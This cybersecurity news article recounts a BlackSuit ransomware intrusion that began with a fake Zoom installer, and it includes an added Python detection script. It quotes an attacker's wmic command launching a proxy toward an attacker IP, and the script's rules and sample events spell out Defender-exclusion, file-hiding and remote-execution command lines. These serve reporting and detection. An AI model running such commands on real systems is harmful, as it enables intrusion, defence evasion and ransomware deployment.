Hackers Used Weaponized Zoom Installer to Gain RDP Access & Deploy BlackSuit Ransomware

Cybercriminals recently leveraged a fake Zoom installer to deploy BlackSuit ransomware across an enterprise network.

The attack began when an unsuspecting victim visited a malicious website mimicking Zoom’s official download page (zoommanager[.]com), where they downloaded what appeared to be a legitimate teleconferencing application installer.

Initial malicious Zoom installer download via zoommanager[.]com (Source – The DFIR Report)

The weaponized installer, built with Inno Setup, contained a malicious downloader known as “d3f@ckloader”, written in Inno Setup’s Pascal scripting language.


This initial stage established persistence by adding the installation directory to Windows Defender exclusions and marking files as hidden.

The malware then connected to a Steam Community profile page to obtain the IP address hosting the second-stage malware.

The DFIR Report researchers noted that after downloading two ZIP archives from the command-and-control server, the malware executed both the legitimate Zoom installer (to maintain the illusion of normality) and the malicious payload.

This resulted in SectopRAT being injected into MSBuild.exe, which established initial persistence through a startup entry.

Execution graph (Source – The DFIR Report)

After nine days of dwell time, the attack escalated when SectopRAT deployed both Brute Ratel (whose agents are known as “Badgers”) and Cobalt Strike beacons across the network.

These tools facilitated credential harvesting from LSASS memory and lateral movement using Windows remote service creation.

Lateral Movement (Source – The DFIR Report)

RDP Tunneling for Network Traversal

The most notable aspect of this intrusion was the attackers’ use of a proxy tool called QDoor to establish RDP access throughout the environment.

The malware was deployed on domain controllers and configured to proxy traffic to the attacker-controlled server at 143.244.146[.]183.

%WINDIR%\system32\cmd.exe /C wmic /node:"REDACTED" process call create "%WINDIR%\Temp\svhost.exe "143.244.146[.]183""
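The installer-stage behaviours described earlier (adding the install directory to Windows Defender exclusions, hiding files, and injecting into MSBuild.exe) and the remote wmic process creation shown above all leave process-creation telemetry that a SOC can alert on. The following is an added detection example; it is not code from the article or from The DFIR Report. It runs a few rules over constructed process-creation records: the Add-MpPreference and attrib command lines, the host names, the installer file name, the paths and the 203.0.113.10 address are assumptions for illustration, not values observed in the reported intrusion.

```python
"""Simple process-creation rules for the behaviours named in the BlackSuit write-up.

Added example, not from the original article. Event records and their values
are constructed; field layout mirrors what Sysmon Event ID 1 or Windows 4688
(with command-line auditing) would provide after parsing.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional


@dataclass(frozen=True)
class Event:
    host: str      # endpoint that logged the process start
    parent: str    # parent process image (basename or full path)
    image: str     # started process image (basename or full path)
    cmdline: str   # full command line of the started process


@dataclass(frozen=True)
class Finding:
    rule: str
    host: str
    detail: str


# Defender exclusion added via PowerShell cmdlet or direct registry write.
DEFENDER_EXCLUSION = re.compile(
    r"Add-MpPreference\s+-ExclusionPath|Windows Defender\\Exclusions\\Paths",
    re.IGNORECASE)
# attrib.exe setting the hidden attribute (used to hide dropped files).
ATTRIB_HIDDEN = re.compile(r"\battrib(\.exe)?\b.*\+h", re.IGNORECASE)
# wmic remote process creation, as in the QDoor deployment command.
WMIC_REMOTE_CREATE = re.compile(
    r"wmic(\.exe)?\s+/node:\S+.*process\s+call\s+create", re.IGNORECASE)
TEMP_PATH = re.compile(r"\\temp\\", re.IGNORECASE)
# Parents that legitimately spawn MSBuild.exe in a build environment (assumption).
MSBUILD_OK_PARENTS = {"devenv.exe", "msbuild.exe", "dotnet.exe", "vbcscompiler.exe"}


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def check_defender_exclusion(ev: Event) -> Optional[Finding]:
    if DEFENDER_EXCLUSION.search(ev.cmdline):
        return Finding("defender_exclusion_added", ev.host, ev.cmdline)
    return None


def check_hidden_attrib(ev: Event) -> Optional[Finding]:
    if ATTRIB_HIDDEN.search(ev.cmdline):
        return Finding("hidden_attribute_set", ev.host, ev.cmdline)
    return None


def check_wmic_remote_create(ev: Event) -> Optional[Finding]:
    if WMIC_REMOTE_CREATE.search(ev.cmdline):
        # Remote creation of a binary living under a Temp directory is the
        # higher-confidence variant; plain remote creation is still worth review.
        rule = ("wmic_remote_process_create_from_temp"
                if TEMP_PATH.search(ev.cmdline) else "wmic_remote_process_create")
        return Finding(rule, ev.host, ev.cmdline)
    return None


def check_msbuild_parent(ev: Event) -> Optional[Finding]:
    # MSBuild.exe started by something other than build tooling is a common
    # sign of injection / proxy execution.
    if _basename(ev.image) == "msbuild.exe" and _basename(ev.parent) not in MSBUILD_OK_PARENTS:
        return Finding("msbuild_unexpected_parent", ev.host, f"parent={ev.parent}")
    return None


CHECKS = (check_defender_exclusion, check_hidden_attrib,
          check_wmic_remote_create, check_msbuild_parent)


def scan(events: Iterable[Event]) -> List[Finding]:
    """Apply every rule to every event and return all findings."""
    findings: List[Finding] = []
    for ev in events:
        for check in CHECKS:
            hit = check(ev)
            if hit is not None:
                findings.append(hit)
    return findings


# Constructed sample telemetry: four malicious-looking records, two benign ones.
SAMPLE_EVENTS = [
    Event("WS01", "FakeZoomSetup.exe", "powershell.exe",
          'powershell.exe -Command "Add-MpPreference -ExclusionPath '
          'C:\\Users\\victim\\AppData\\Local\\Temp\\zoom"'),
    Event("WS01", "FakeZoomSetup.exe", "attrib.exe",
          'attrib +h +s "C:\\Users\\victim\\AppData\\Local\\Temp\\zoom\\*"'),
    Event("WS01", "FakeZoomSetup.exe", "MSBuild.exe",
          "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe"),
    Event("DC01", "cmd.exe", "wmic.exe",
          'wmic /node:"FS01" process call create "C:\\Windows\\Temp\\svhost.exe 203.0.113.10"'),
    Event("BUILD01", "devenv.exe", "MSBuild.exe", "MSBuild.exe project.sln"),  # benign
    Event("WS02", "explorer.exe", "powershell.exe", "powershell.exe Get-Process"),  # benign
]


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.host}: {f.detail}")
```

The attrib and MSBuild rules are deliberately broad and will fire on some legitimate administration and build activity; in production they belong behind an allowlist of known parents and paths, while the Defender-exclusion and remote-wmic-from-Temp rules are specific enough to page on directly.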

This tunneling technique allowed the threat actors to establish remote desktop connections through the compromised domain controller to access file servers, where they deployed WinRAR to archive sensitive data.

The attackers then exfiltrated approximately 934 MB of data using the cloud storage service Bublup before deploying BlackSuit ransomware using PsExec for remote execution.

The sophisticated multi-stage attack chain, combined with the nine-day dwell time, demonstrates the threat actors’ patience and methodical approach to maximizing both data theft and encryption impact.


Tushar Subhra Dutta
Tushar is a cyber security content editor with a passion for creating captivating and informative content. With years of experience in cyber security, he covers cyber security news, technology and other news.